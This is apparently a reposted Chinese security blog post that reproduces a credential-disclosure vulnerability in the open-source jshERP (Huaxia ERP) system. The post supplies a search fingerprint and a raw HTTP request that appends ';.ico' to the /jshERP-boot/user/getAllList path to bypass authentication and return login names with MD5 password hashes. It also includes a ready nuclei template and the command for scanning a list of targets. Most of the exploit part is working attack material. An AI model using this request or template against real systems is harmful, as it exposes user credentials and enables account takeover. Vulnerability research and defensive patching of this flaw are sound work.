免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
jshERP敏感信息泄露漏洞
02
—
漏洞影响
开源ERP系统jshERP所有版本
官网
https://www.huaxiaerp.com/
github
https://github.com/jishenghua/jshERP
系统首页如下
03
—
漏洞描述
华夏ERP基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,可以获取到系统的账号密码。
04
—
body="jshERP-boot"
05
—
漏洞复现
poc如下
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
证明存在漏洞
其中loginName为用户名,password是MD5加密
06
—
nuclei poc
poc文件内容如下
id: jsh-erp-userpassword-leak
info:
name: 华夏ERP账号密码泄露
author: fgz
severity: high
description: '华夏ERP基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。该系统存在信息泄露漏洞,攻击者可以通过特定ULR获取系统账号密码。'
tags: 2023,leak,jshERP
metadata:
3 :
body="jshERP-boot" :
verified: true
http:
method: GET
path:
"{{BaseURL}}/jshERP-boot/user/getAllList;.ico"
matchers:
type: word
words:
"username"
"password"
"loginName"
condition: and
运行POC
.nuclei.exe -t mypoc/华夏erp/jsh-erp-userinfo-leak.yaml -l data/jsherp.txt -me result
原文始发于微信公众号(AI与网安):【漏洞复现】jshERP敏感信息泄露漏洞 nuclei poc
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论